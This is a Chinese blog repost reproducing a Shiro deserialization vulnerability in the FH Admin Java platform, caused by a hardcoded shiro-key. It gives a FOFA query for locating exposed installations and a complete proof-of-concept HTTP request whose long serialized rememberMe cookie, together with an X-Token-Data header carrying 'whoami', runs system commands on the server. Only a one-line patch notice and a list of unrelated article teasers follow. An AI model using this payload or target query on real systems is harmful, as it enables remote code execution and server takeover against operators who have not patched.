FH Admin Shiro反序列化漏洞复现

news2024/11/17 9:40:30

0x01 产品简介

  FH Admin 是一款 java 快速开发平台。

0x02 漏洞概述

 FH Admin CMS 存在 shiro 反序列化漏洞,该漏洞源于软件存在硬编码的 shiro-key,攻击者可利用该 key 生成恶意的序列化数据,在服务器上执行任意代码,执行系统命令、或打入内存马等,获取服务器权限。

0x03 复现环境

FOFA:app="FH-Admin"

0x04 漏洞复现 

PoC

GET /appSysUser/registerSysUser.do HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
X-Token-Data: whoami
Cookie: rememberMe=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
Accept-Encoding: gzip
Connection: close

0x05 修复建议 

⼚商已发布了漏洞修复程序,请及时关注更新:http://www.fhadmin.org/

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/1276729.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

从零开发短视频电商 在AWS上用SageMaker部署开源模型并用Java SDK调用

文章目录 1.创建AWS账户2.登录AWS3.创建域4.部署模型方式一 使用JumpStart可视化界面部署内置的模型方式二 采用python脚本部署私有模型5.调用模型AWS Java SDK调用Http调用6.监控7.自动扩缩容1.创建AWS账户 需要准备好邮箱一个,支持visa功能的信用卡一个。然后到aws上自己去…

vue 修改 this.$confirm 的文字样式、自定义样式

通常使用 confirm 确认框时&#xff0c;一般这样写&#xff1a; <template><el-button type"text" click"open">点击打开 Message Box</el-button> </template><script>export default {methods: {open() {this.$confirm(此…

什么样的SSL证书比较好?

首先需要明确的是最适合自己的就是最好的SSL证书。目前市场上的证书种类很多&#xff0c;那怎么才能挑选出最适合自己的呢&#xff1f;我罗列了几个需要考虑的方面。 1.证书类型&#xff1a;根据您的需求选择合适的证书类型。例如&#xff0c;如果您需要验证公司信息&#xff0…

Python 中的 FileSystem Connector:打通文件系统的便捷通道

更多Python学习内容&#xff1a;ipengtao.com 大家好&#xff0c;我是涛哥&#xff0c;今天为大家分享 Python 中的 FileSystem Connector&#xff1a;打通文件系统的便捷通道&#xff0c;全文4100字&#xff0c;阅读大约11分钟。 在现代软件开发中&#xff0c;文件系统是不可或…

Android studio Load error:undefined path variables

android stuido 报错 Load error&#xff1a;undefined path variables Gson is undefined 处理方法&#xff1a; 点击进行Sync Project with Gradle Files

数据结构算法-选择排序算法

引言 说起排序算法&#xff0c;那可就多了去&#xff0c;首先了解什么叫排序 以B站为例&#xff1a; 蔡徐坤在B站很受欢迎呀&#xff0c;先来看一下综合排序 就是播放量和弹幕量&#xff0c;收藏量 一键三连 都很高这是通过一些排序算法 才能体现出综合排序 蔡徐坤鬼畜 按照播…

2023年小美赛A题论文无偿分享!!

A题论文分享 链接&#xff1a; https://pan.baidu.com/s/1cltswCuiPG30HhuysrEVuA 提取码&#xff1a;sxjm 欢迎大家批评指正&#xff0c; 为了方便大家摘抄&#xff0c;所有内容均为中文。但是&#xff01;&#xff01;该比赛是英文论文竞赛&#xff0c;大家需要全部自行…

鸿蒙(HarmonyOS)应用开发——容器组件(Grid组件)

前言 前面一篇文章中&#xff0c;已经说了List组件。那么接下来就是容器组件中的Grid组件 #mermaid-svg-oz1b7w45ASmMlZFa {font-family:"trebuchet ms",verdana,arial,sans-serif;font-size:16px;fill:#333;}#mermaid-svg-oz1b7w45ASmMlZFa .error-icon{fill:#5522…

centos7 yum安装jdk1.8

1.列出可安装版本 yum -y list java* 2.安装 yum -y install java-1.8.0-openjdk* 3.检查命令 java -version javac java

Leetcode—2661.找出叠涂元素【中等】

2023每日刷题&#xff08;四十六&#xff09; Leetcode—2661.找出叠涂元素 题意解读 题目意思就是&#xff0c;按照arr数组从左到右的顺序遍历各个arr[i]&#xff0c;涂抹这个值在矩阵中对应位置的网格&#xff0c;一旦你发现它所在的行或者列满员了&#xff0c;就返回这个i…

MyBatis-逆向工程

1.简单生成 1.添加依赖和插件 <dependencies><!-- MyBatis核心依赖包 --><dependency><groupId>org.mybatis</groupId><artifactId>mybatis</artifactId><version>3.5.9</version></dependency><!-- MySQL驱动…

抑郁症由什么引起?

抑郁症的发生并不是单一原因所导致&#xff0c;而是多种因素相互作用的结果。以下是一些主要的原因&#xff1a; 首先&#xff0c;生物学因素在抑郁症的发病中起到了关键作用。研究显示&#xff0c;抑郁症可能与遗传有关&#xff0c;家族中有患抑郁症的成员会增加个体患病的风…

『吴秋霖赠书活动 | 第五期』《Kubernetes原生微服务开发》

【作者主页】&#xff1a;吴秋霖 【作者介绍】&#xff1a;Python领域优质创作者、阿里云博客专家、华为云享专家。长期致力于Python与爬虫领域研究与开发工作&#xff01; 【作者推荐】&#xff1a;对JS逆向感兴趣的朋友可以关注《爬虫JS逆向实战》&#xff0c;对分布式爬虫平…

高速风梳的方案特点--【其利天下技术】

风梳作为美容美发用的一种设备&#xff0c;一直受国内外很多女性用户的喜爱。它对比高速风筒来说&#xff0c;因其设计的用途略有区别&#xff0c;一方面风梳可以做梳子用&#xff0c;换了头还可以作为风筒使用&#xff0c;所以在一定意义上&#xff0c;风梳更受人欢迎。 近年…

水利安全监测方案——基于RTU200的解决方案

引言&#xff1a; 水资源是人类赖以生存的重要基础&#xff0c;对于保障水利系统安全运行以及应对自然灾害起着关键作用。为了实现水利安全监测的目标&#xff0c;我们提出了基于RTU200的解决方案。本方案将结合RTU200的可靠性、灵活性和高效性&#xff0c;为您打造一个全面的…

CentOS 7 配置tomcat

简介 Tomcat是一个使用Java编写的开源Web应用服务器,是由Apache Software Foundation管理的一个项目。它是一个轻量级的应用服务器,可以下载、安装和使用,而且还提供了许多高级功能,例如支持Java Servlet、JavaServer Pages (JSP)和JavaServer Faces (JSF) 等JavaEE技术,…

一维和多维随机变量的高斯分布(正态分布)

高斯分布也叫正态分布。 一维随机变量正态分布的概率密度函数 其中&#xff0c;是期望&#xff0c;是方差。 多维随机变量正态分布的概率密度函数 假设是n维随机变量&#xff0c;表示矩阵的转置 期望向量是&#xff0c;协方差矩阵是&#xff0c;是协方差矩阵的行列式&#x…

“上云”还是“下云”?探云计算的下一站未来!

引言 10 月 27 日&#xff0c;X&#xff08;原Twitter&#xff09;工程技术发布帖子称&#xff0c;在过去的一年里&#xff0c;技术团队优化了 X 的云服务使用方式&#xff0c;着手将更多工作负载迁往本地基础设施。这一转变使 X 每月的云成本降低了 60%。所有媒体、Blob 存储均…

windows ssh时出现Bad local forwarding specification的解决方案

大家好,我是爱编程的喵喵。双985硕士毕业,现担任全栈工程师一职,热衷于将数据思维应用到工作与生活中。从事机器学习以及相关的前后端开发工作。曾在阿里云、科大讯飞、CCF等比赛获得多次Top名次。现为CSDN博客专家、人工智能领域优质创作者。喜欢通过博客创作的方式对所学的…

服务器数据恢复—服务器断电导致XenServer数据文件丢失的数据恢复案例

服务器数据恢复环境&#xff1a; 某品牌720服务器搭配该品牌某型号RAID卡&#xff0c;使用4块STAT硬盘组建了一组RAID10阵列。服务器上部署XenServer虚拟化平台&#xff0c;系统盘 数据盘两个虚拟机磁盘。虚拟机上安装的是Windows Server操作系统&#xff0c;作为Web服务器使用…